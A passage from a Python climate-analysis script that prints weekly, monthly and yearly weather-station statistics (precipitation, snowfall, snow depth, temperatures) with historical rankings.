"" else "M", clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tminM if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[4].year,indvweekdays[4].month,indvweekdays[4].day) and clmt[indvweekdays[4].year][indvweekdays[4].month][indvweekdays[4].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmin if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tmin != "" else "M", clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tminM if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[5].year,indvweekdays[5].month,indvweekdays[5].day) and clmt[indvweekdays[5].year][indvweekdays[5].month][indvweekdays[5].day].tminQ != "" else ""), "{}{}{}".format( clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmin if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tmin != "" else "M", clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tminM if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tminM == "T" else "", "*" if checkDate2(indvweekdays[6].year,indvweekdays[6].month,indvweekdays[6].day) and clmt[indvweekdays[6].year][indvweekdays[6].month][indvweekdays[6].day].tminQ != "" else ""))) print("") print("Total Precipitation: {}{}".format( round(sum(w_prcp),2), ", Rank: {}".format(rank(prcphist.index(round(sum(w_prcp),2))+1)) if sum(w_prcp) != 0 else "" )) print("Total Precipitation Days (>= T): {}".format(w_prcpDAYS)) if w_snowDAYS >= 1: print("Total Snow: {}{}".format( round(sum(w_snow),1), ", Rank: {}".format(rank(snowhist.index(round(sum(w_snow),1))+1)) if sum(w_snow) != 0 else "" )) print("Total Snow Days (>= T): {}".format(w_snowDAYS)) if len(w_snwd) > 0 and mean(w_snwd) > 0: print("Average Snow Depth: {}{}".format( round(mean(w_snwd),1), ", Rank: {}".format(rank(snwdhist.index(round(mean(w_snwd),1))+1)) if mean(w_snwd) != 0 and len(w_snwd) > excludeweek else "" )) if records_in_week > excludeweek and (len(w_tmax) <= excludeweek or len(w_tmin) <= excludeweek): print("*** TEMPERATURE STATS LIKELY UNDERREPRESENTED ***") print("Average Temperature: {}{}{}".format( round(mean(w_alltemps),1) if len(w_alltemps) > 0 else "N/A", ", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(w_alltemps),1))+1)) if len(w_alltemps) > excludeweek*2 and tavgdeschist.index(round(mean(w_alltemps),1)) <= tavgaschist.index(round(mean(w_alltemps),1)) else "", ", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(w_alltemps),1))+1)) if len(w_alltemps) > excludeweek*2 and tavgaschist.index(round(mean(w_alltemps),1)) <= tavgdeschist.index(round(mean(w_alltemps),1)) else "" )) print("Average Max Temperature: {}{}{}".format( round(mean(w_tmax),1) if len(w_tmax) > 0 else "N/A", ", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(w_tmax),1))+1)) if len(w_tmax) > excludeweek and tmaxdeschist.index(round(mean(w_tmax),1)) <= tmaxaschist.index(round(mean(w_tmax),1)) else "", ", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(w_tmax),1))+1)) if len(w_tmax) > excludeweek and tmaxaschist.index(round(mean(w_tmax),1)) <= tmaxdeschist.index(round(mean(w_tmax),1)) else "" )) #print(tmaxaschist.index(round(mean(w_tmax),1)),tmaxdeschist.index(round(mean(w_tmax),1))) print("Average Min Temperature: {}{}{}".format( round(mean(w_tmin),1) if len(w_tmin) > 0 else "N/A", ", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(w_tmin),1))+1)) if tmindeschist.index(round(mean(w_tmin),1)) <= tminaschist.index(round(mean(w_tmin),1)) else "", ", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(w_tmin),1))+1)) if len(w_tmin) > excludeweek and tminaschist.index(round(mean(w_tmin),1)) <= tmindeschist.index(round(mean(w_tmin),1)) else "" )) #print(tminaschist.index(round(mean(w_tmin),1)),tmindeschist.index(round(mean(w_tmin),1))) print("") def monthStats(y,m): """Report on recorded statistics for a month of interest. It accepts only arguments for the year and month of interest. Passed arguments MUST be integers. monthStats(year,month) EXAMPLE: monthStats(2005,7) -> Returns a printout of month-based statistics from July 2005. """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") monthExists = checkDate(y,m) if monthExists: ranks = ["th","st","nd","rd","th","th","th","th","th","th"] prcpaschist = sorted(list(set(list(var for var in clmt_vars_months["prcp"] for MONTH in clmt_vars_months["prcp"][var] if MONTH.month == m and clmt[MONTH.year][MONTH.month]["recordqty"] > excludemonth)))) prcpdeschist = sorted(list(set(list(var for var in clmt_vars_months["prcp"] for MONTH in clmt_vars_months["prcp"][var] if MONTH.month == m))),reverse=True) #prcpDAYSaschist = sorted(set(list(clmt[Y][m]["prcpDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y] and clmt[Y][m]["recordqty"] > excludemonth))) #prcpDAYSdeschist = sorted(list(set(list(clmt[Y][m]["prcpDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y]))),reverse=True) #snowaschist = sorted(list(var for var in clmt_vars_months["snow"] for MONTH in clmt_vars_months["snow"][var] if MONTH.month == m and clmt[MONTH.year][MONTH.month]["recordqty"] > excludemonth)) snowdeschist = sorted(list(set(list(var for var in clmt_vars_months["snow"] for MONTH in clmt_vars_months["snow"][var] if MONTH.month == m))),reverse=True) #snowDAYSdeschist = sorted(list(set(list(clmt[Y][m]["snowDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y]))),reverse=True) #snwddeschist = sorted(list(set(list(var for var in clmt_vars_months["snwd"] for MONTH in clmt_vars_months["snwd"][var] if MONTH.month == m))),reverse=True) #snwdDAYSdeschist = sorted(list(set(list(clmt[Y][m]["snwdDAYS"] for Y in [yr for yr in clmt if type(yr) == int] if m in clmt[Y]))),reverse=True) tmaxaschist = sorted(list(set(list(var for var in clmt_vars_months["tmax"] for MONTH in clmt_vars_months["tmax"][var] if MONTH.month == m)))) tmaxdeschist = sorted(list(set(list(var for var in clmt_vars_months["tmax"] for MONTH in clmt_vars_months["tmax"][var] if MONTH.month == m))),reverse=True) tminaschist = sorted(list(set(list(var for var in clmt_vars_months["tmin"] for MONTH in clmt_vars_months["tmin"][var] if MONTH.month == m)))) tmindeschist = sorted(list(set(list(var for var in clmt_vars_months["tmin"] for MONTH in clmt_vars_months["tmin"][var] if MONTH.month == m))),reverse=True) tavgaschist = sorted(list(set(list(var for var in clmt_vars_months["tavg"] for MONTH in clmt_vars_months["tavg"][var] if MONTH.month == m)))) tavgdeschist = sorted(list(set(list(var for var in clmt_vars_months["tavg"] for MONTH in clmt_vars_months["tavg"][var] if MONTH.month == m))),reverse=True) #print(tavgdeschist) #for x in [prcphist,snowhist,tmaxaschist,tmaxdeschist,tminaschist,tmindeschist,tavgaschist,tavgdeschist]: print(x) if clmt[y][m]["recordqty"] <= excludemonth: print("-------------------------------------") print("*** MONLTHLY STATS MAY NOT BE COMPLETE FOR RELIANCE ON STATISTICS ***") print("-------------------------------------") print("Monthly Statistics for {} {}".format(calendar.month_name[m],y)) print("{}: {}".format(clmt["station"],clmt["station_name"])) print("Quantity of Records: {}".format(clmt[y][m]["recordqty"])) print("* Reported rankings are relative to the month of {}".format(calendar.month_name[m])) print("-----") # PRCP related try: print("Total Precipitation: {}{}{}".format( round(sum(clmt[y][m]["prcp"]),2), ", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(clmt[y][m]["prcp"]),2))+1)) if sum(clmt[y][m]["prcp"]) > 0 and prcpdeschist.index(round(sum(clmt[y][m]["prcp"]),2)) <= prcpaschist.index(round(sum(clmt[y][m]["prcp"]),2)) else "", ", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(clmt[y][m]["prcp"]),2))+1)) if clmt[y][m]["recordqty"] > excludemonth and prcpaschist.index(round(sum(clmt[y][m]["prcp"]),2)) <= prcpdeschist.index(round(sum(clmt[y][m]["prcp"]),2)) else "")) except: print("Total Precipitation: {}".format(round(sum(clmt[y][m]["prcp"]),2))) print("Total Precipitation Days (>= T): {}".format(clmt[y][m]["prcpDAYS"])) if round(sum(clmt[y][m]["prcp"]),2) > 0: print("-- Highest Daily Precip: {}".format(clmt[y][m]["prcpPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["prcpPROP"]["day_max"][1][len(clmt[y][m]["prcpPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) # SNOW related if sum(clmt[y][m]["snow"]) > 0 or clmt[y][m]["snowDAYS"] > 0: print("Total Snow: {}{}".format( round(sum(clmt[y][m]["snow"]),1), ", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(clmt[y][m]["snow"]),2))+1)) if sum(clmt[y][m]["snow"]) > 0 else ", -- ; " )) print("Total Snow Days (>= T): {}".format(clmt[y][m]["snowDAYS"])) if round(sum(clmt[y][m]["snow"]),1) > 0: print("-- Highest Daily Snow Total: {}".format(clmt[y][m]["snowPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["snowPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["snowPROP"]["day_max"][1][len(clmt[y][m]["snowPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) # SNWD related if clmt[y][m]["snwdDAYS"] > 0: print("Total Days with Snow on the Ground ('snwd' >= T): {}".format(clmt[y][m]["snwdDAYS"])) if any(v > 0 for v in clmt[y][m]["snwd"]): # If any of the snwd days are > 0 print("-- Highest Daily Snow-Depth Total: {}".format(clmt[y][m]["snwdPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["snwdPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["snwdPROP"]["day_max"][1][len(clmt[y][m]["snwdPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) try: print("Average Temperature: {}{}{}".format( round(mean(clmt[y][m]["tempAVGlist"]),1), ", Rank: {} Warmest".format(rank(tavgdeschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1))+1)) if len(clmt[y][m]["tempAVGlist"]) > excludemonth*2 and tavgdeschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) <= tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) else "", ", Rank: {} Coolest".format(rank(tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1))+1)) if len(clmt[y][m]["tempAVGlist"]) > excludemonth*2 and tavgaschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) <= tavgdeschist.index(round(mean(clmt[y][m]["tempAVGlist"]),1)) else "" )) except: print("Average Temperature: N/A") try: print("Average MAX Temperature: {}{}{}".format( round(mean(clmt[y][m]["tmax"]),1), ", Rank: {} Warmest".format(rank(tmaxdeschist.index(round(mean(clmt[y][m]["tmax"]),1))+1)) if len(clmt[y][m]["tmax"]) > excludemonth and tmaxdeschist.index(round(mean(clmt[y][m]["tmax"]),1)) <= tmaxaschist.index(round(mean(clmt[y][m]["tmax"]),1)) else "", ", Rank: {} Coolest".format(rank(tmaxaschist.index(round(mean(clmt[y][m]["tmax"]),1))+1)) if len(clmt[y][m]["tmax"]) > excludemonth and tmaxaschist.index(round(mean(clmt[y][m]["tmax"]),1)) <= tmaxdeschist.index(round(mean(clmt[y][m]["tmax"]),1)) else "" )) if round(sum(clmt[y][m]["tmax"]),1) > 0: print("-- Warmest Daily TMAX: {}".format(clmt[y][m]["tmaxPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["tmaxPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tmaxPROP"]["day_max"][1][len(clmt[y][m]["tmaxPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if round(sum(clmt[y][m]["tmax"]),1) > 0: print("-- Coolest Daily TMAX: {}".format(clmt[y][m]["tmaxPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y][m]["tmaxPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tmaxPROP"]["day_min"][1][len(clmt[y][m]["tmaxPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) except: print("Average MAX Temperature: N/A") try: print("Average MIN Temperature: {}{}{}".format( round(mean(clmt[y][m]["tmin"]),1), ", Rank: {} Warmest".format(rank(tmindeschist.index(round(mean(clmt[y][m]["tmin"]),1))+1)) if len(clmt[y][m]["tmin"]) > excludemonth and tmindeschist.index(round(mean(clmt[y][m]["tmin"]),1)) <= tminaschist.index(round(mean(clmt[y][m]["tmin"]),1)) else "", ", Rank: {} Coolest".format(rank(tminaschist.index(round(mean(clmt[y][m]["tmin"]),1))+1)) if len(clmt[y][m]["tmin"]) > excludemonth and tminaschist.index(round(mean(clmt[y][m]["tmin"]),1)) <= tmindeschist.index(round(mean(clmt[y][m]["tmin"]),1)) else "" )) if round(sum(clmt[y][m]["tmin"]),1) > 0: print("-- Warmest Daily TMIN: {}".format(clmt[y][m]["tminPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y][m]["tminPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tminPROP"]["day_max"][1][len(clmt[y][m]["tminPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) if round(sum(clmt[y][m]["tmin"]),1) > 0: print("-- Coolest Daily TMIN: {}".format(clmt[y][m]["tminPROP"]["day_min"][0]),end = " ::: ") for x in clmt[y][m]["tminPROP"]["day_min"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y][m]["tminPROP"]["day_min"][1][len(clmt[y][m]["tminPROP"]["day_min"][1])-1] else print("{}".format(x.daystr)) except: print("Average MIN Temperature: N/A") if all(len(x) == 0 for x in [clmt[y][m]["tempAVGlist"],clmt[y][m]["tmax"],clmt[y][m]["tmin"]]): print("*** No Reliable Temperature Data for {} {}".format(calendar.month_abbr[m],y)) print("-----") def yearStats(y): """Report on recorded statistics for a year of interest. It accepts only an argument for the year. Passed argument MUST be an integer. yearStats(year) EXAMPLE: yearStats(1945) -> Returns a printout of year-based statistics from 1945 """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") # clmt[int(each[2][0:4])]["prcpPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]],"month_min":[999,[]]} # clmt[int(each[2][0:4])]["snowPROP"] = {"day_max":[-1,[]],"month_max":[-1,[]]} # clmt[int(each[2][0:4])]["tempAVGlist"] = [] # clmt[int(each[2][0:4])]["tmax"] = [] # clmt[int(each[2][0:4])]["tmaxPROP"] = {"day_max":[-999,[]],"day_min":[999,[]],"month_AVG_max":[-999,[]],"month_AVG_min":[999,[]]} yearExists = checkDate(y) if yearExists: prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist = yearRank("temps",5,yearStatsRun=True) snwdDAYSdeschist = sorted(set(list(clmt[YR]["snwdDAYS"] for YR in [Y for Y in clmt if type(Y) == int] if clmt[YR]["snwdDAYS"] != 0)),reverse=True) snwdDAYSaschist = sorted(set(list(clmt[YR]["snwdDAYS"] for YR in [Y for Y in clmt if type(Y) == int] if clmt[YR]["recordqty"] > excludeyear))) #for x in [prcpaschist, prcpdeschist, snowaschist, snowdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist]: print(len(x)) print("") print("{:^55}".format("Yearly Statistics for {}".format(y))) print("{:^55}".format("{}: {}".format(clmt["station"],clmt["station_name"]))) print("{:^55}".format("Quantity of Records: {}".format(clmt[y]["recordqty"]))) if clmt[y]["recordqty"] <= excludeyear: print("{:-^55}".format("")) print("*** YEAR STATS MAY NOT BE COMPLETE FOR RELIANCE ON STATISTICS ***") print("{:-^55}".format("")) print("{:^6}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|".format("","JAN","FEB","MAR","APR","MAY","JUN")) print("{:-^55}".format("")) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "PRCP", "{:.2f}".format(round(sum(clmt[y][1]["prcp"]),2)) if 1 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][2]["prcp"]),2)) if 2 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][3]["prcp"]),2)) if 3 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][4]["prcp"]),2)) if 4 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][5]["prcp"]),2)) if 5 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][6]["prcp"]),2)) if 6 in clmt[y] else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "SNOW", "{:.1f}".format(round(sum(clmt[y][1]["snow"]),1)) if 1 in clmt[y] and (sum(clmt[y][1]["snow"]) > 0 or clmt[y][1]["snowDAYS"] > 0) else (" -- " if 1 in clmt[y] and sum(clmt[y][1]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][2]["snow"]),1)) if 2 in clmt[y] and (sum(clmt[y][2]["snow"]) > 0 or clmt[y][2]["snowDAYS"] > 0) else (" -- " if 2 in clmt[y] and sum(clmt[y][2]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][3]["snow"]),1)) if 3 in clmt[y] and (sum(clmt[y][3]["snow"]) > 0 or clmt[y][3]["snowDAYS"] > 0) else (" -- " if 3 in clmt[y] and sum(clmt[y][3]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][4]["snow"]),1)) if 4 in clmt[y] and (sum(clmt[y][4]["snow"]) > 0 or clmt[y][4]["snowDAYS"] > 0) else (" -- " if 4 in clmt[y] and sum(clmt[y][4]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][5]["snow"]),1)) if 5 in clmt[y] and (sum(clmt[y][5]["snow"]) > 0 or clmt[y][5]["snowDAYS"] > 0) else (" -- " if 5 in clmt[y] and sum(clmt[y][5]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][6]["snow"]),1)) if 6 in clmt[y] and (sum(clmt[y][6]["snow"]) > 0 or clmt[y][6]["snowDAYS"] > 0) else (" -- " if 6 in clmt[y] and sum(clmt[y][6]["snow"]) == 0 else ""), )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TAVG", "{:.1f}".format(round(mean(clmt[y][1]["tempAVGlist"]),1)) if 1 in clmt[y] and len(clmt[y][1]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][2]["tempAVGlist"]),1)) if 2 in clmt[y] and len(clmt[y][2]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][3]["tempAVGlist"]),1)) if 3 in clmt[y] and len(clmt[y][3]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][4]["tempAVGlist"]),1)) if 4 in clmt[y] and len(clmt[y][4]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][5]["tempAVGlist"]),1)) if 5 in clmt[y] and len(clmt[y][5]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][6]["tempAVGlist"]),1)) if 6 in clmt[y] and len(clmt[y][6]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMAX", "{:.1f}".format(round(mean(clmt[y][1]["tmax"]),1)) if 1 in clmt[y] and len(clmt[y][1]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][2]["tmax"]),1)) if 2 in clmt[y] and len(clmt[y][2]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][3]["tmax"]),1)) if 3 in clmt[y] and len(clmt[y][3]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][4]["tmax"]),1)) if 4 in clmt[y] and len(clmt[y][4]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][5]["tmax"]),1)) if 5 in clmt[y] and len(clmt[y][5]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][6]["tmax"]),1)) if 6 in clmt[y] and len(clmt[y][6]["tmax"]) > 1 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMIN", "{:.1f}".format(round(mean(clmt[y][1]["tmin"]),1)) if 1 in clmt[y] and len(clmt[y][1]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][2]["tmin"]),1)) if 2 in clmt[y] and len(clmt[y][2]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][3]["tmin"]),1)) if 3 in clmt[y] and len(clmt[y][3]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][4]["tmin"]),1)) if 4 in clmt[y] and len(clmt[y][4]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][5]["tmin"]),1)) if 5 in clmt[y] and len(clmt[y][5]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][6]["tmin"]),1)) if 6 in clmt[y] and len(clmt[y][6]["tmin"]) > 1 else "", )) print("{:-^55}".format("")) print("{:^6}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|{:^7}|".format("","JUL","AUG","SEP","OCT","NOV","DEC")) print("{:-^55}".format("")) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "PRCP", "{:.2f}".format(round(sum(clmt[y][7]["prcp"]),2)) if 7 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][8]["prcp"]),2)) if 8 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][9]["prcp"]),2)) if 9 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][10]["prcp"]),2)) if 10 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][11]["prcp"]),2)) if 11 in clmt[y] else "", "{:.2f}".format(round(sum(clmt[y][12]["prcp"]),2)) if 12 in clmt[y] else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "SNOW", "{:.1f}".format(round(sum(clmt[y][7]["snow"]),1)) if 7 in clmt[y] and (sum(clmt[y][7]["snow"]) > 0 or clmt[y][7]["snowDAYS"] > 0) else (" -- " if 7 in clmt[y] and sum(clmt[y][7]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][8]["snow"]),1)) if 8 in clmt[y] and (sum(clmt[y][8]["snow"]) > 0 or clmt[y][8]["snowDAYS"] > 0) else (" -- " if 8 in clmt[y] and sum(clmt[y][8]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][9]["snow"]),1)) if 9 in clmt[y] and (sum(clmt[y][9]["snow"]) > 0 or clmt[y][9]["snowDAYS"] > 0) else (" -- " if 9 in clmt[y] and sum(clmt[y][9]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][10]["snow"]),1)) if 10 in clmt[y] and (sum(clmt[y][10]["snow"]) > 0 or clmt[y][10]["snowDAYS"] > 0) else (" -- " if 10 in clmt[y] and sum(clmt[y][10]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][11]["snow"]),1)) if 11 in clmt[y] and (sum(clmt[y][11]["snow"]) > 0 or clmt[y][11]["snowDAYS"] > 0) else (" -- " if 11 in clmt[y] and sum(clmt[y][11]["snow"]) == 0 else ""), "{:.1f}".format(round(sum(clmt[y][12]["snow"]),1)) if 12 in clmt[y] and (sum(clmt[y][12]["snow"]) > 0 or clmt[y][12]["snowDAYS"] > 0) else (" -- " if 12 in clmt[y] and sum(clmt[y][12]["snow"]) == 0 else ""), )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TAVG", "{:.1f}".format(round(mean(clmt[y][7]["tempAVGlist"]),1)) if 7 in clmt[y] and len(clmt[y][7]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][8]["tempAVGlist"]),1)) if 8 in clmt[y] and len(clmt[y][8]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][9]["tempAVGlist"]),1)) if 9 in clmt[y] and len(clmt[y][9]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][10]["tempAVGlist"]),1)) if 10 in clmt[y] and len(clmt[y][10]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][11]["tempAVGlist"]),1)) if 11 in clmt[y] and len(clmt[y][11]["tempAVGlist"]) > 2 else "", "{:.1f}".format(round(mean(clmt[y][12]["tempAVGlist"]),1)) if 12 in clmt[y] and len(clmt[y][12]["tempAVGlist"]) > 2 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMAX", "{:.1f}".format(round(mean(clmt[y][7]["tmax"]),1)) if 7 in clmt[y] and len(clmt[y][7]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][8]["tmax"]),1)) if 8 in clmt[y] and len(clmt[y][8]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][9]["tmax"]),1)) if 9 in clmt[y] and len(clmt[y][9]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][10]["tmax"]),1)) if 10 in clmt[y] and len(clmt[y][10]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][11]["tmax"]),1)) if 11 in clmt[y] and len(clmt[y][11]["tmax"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][12]["tmax"]),1)) if 12 in clmt[y] and len(clmt[y][12]["tmax"]) > 1 else "", )) print("{:^6}|{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |{:>6} |".format( "TMIN", "{:.1f}".format(round(mean(clmt[y][7]["tmin"]),1)) if 7 in clmt[y] and len(clmt[y][7]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][8]["tmin"]),1)) if 8 in clmt[y] and len(clmt[y][8]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][9]["tmin"]),1)) if 9 in clmt[y] and len(clmt[y][9]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][10]["tmin"]),1)) if 10 in clmt[y] and len(clmt[y][10]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][11]["tmin"]),1)) if 11 in clmt[y] and len(clmt[y][11]["tmin"]) > 1 else "", "{:.1f}".format(round(mean(clmt[y][12]["tmin"]),1)) if 12 in clmt[y] and len(clmt[y][12]["tmin"]) > 1 else "", )) print("{:-^55}".format("")) print(" Total Precipitation: {}".format(round(sum(clmt[y]["prcp"]),2)),end="") try: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(clmt[y]["prcp"]),2))+1)),end="") if sum(clmt[y]["prcp"]) > 0 and prcpdeschist.index(round(sum(clmt[y]["prcp"]),2)) <= prcpaschist.index(round(sum(clmt[y]["prcp"]),2)) else print("",end="") except: print(", Rank: {} Wettest".format(rank(prcpdeschist.index(round(sum(clmt[y]["prcp"]),2))+1)),end="") try: print(", Rank: {} Driest".format(rank(prcpaschist.index(round(sum(clmt[y]["prcp"]),2))+1))) if clmt[y]["recordqty"] > excludeyear and prcpaschist.index(round(sum(clmt[y]["prcp"]),2)) <= prcpdeschist.index(round(sum(clmt[y]["prcp"]),2)) else print("") except: print("") print(" Total Precipitation Days (>=T): {}".format(clmt[y]["prcpDAYS"]),end="") try: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(clmt[y]["prcpDAYS"])+1)),end="") if clmt[y]["prcpDAYS"] > 0 and prcpDAYSdeschist.index(clmt[y]["prcpDAYS"]) <= prcpDAYSaschist.index(clmt[y]["prcpDAYS"]) else print("",end="") except: print(", Rank: {} Most".format(rank(prcpDAYSdeschist.index(clmt[y]["prcpDAYS"])+1)),end="") try: print(", Rank: {} Least".format(rank(prcpDAYSaschist.index(clmt[y]["prcpDAYS"])+1))) if prcpDAYSaschist.index(clmt[y]["prcpDAYS"]) <= prcpDAYSdeschist.index(clmt[y]["prcpDAYS"]) else print("") except: print("") if round(sum(clmt[y]["prcp"]),2) > 0: print(" -- Highest Daily Precip: {}".format(clmt[y]["prcpPROP"]["day_max"][0]),end = " ::: ") for x in clmt[y]["prcpPROP"]["day_max"][1]: print("{}, ".format(x.daystr), end=" ") if x != clmt[y]["prcpPROP"]["day_max"][1][len(clmt[y]["prcpPROP"]["day_max"][1])-1] else print("{}".format(x.daystr)) print(" Total Snow: {}".format(round(sum(clmt[y]["snow"]),1)),end="") try: print(", Rank: {} Snowiest".format(rank(snowdeschist.index(round(sum(clmt[y]["snow"]),1))+1)),end="") if sum(clmt[y]["snow"]) > 0 and snowdeschist.index(round(sum(clmt[y]["snow"]),1)) <= snowaschist.index(round(sum(clmt[y]["snow"]),1)) else print("",end="") except: print(", Rank: {} 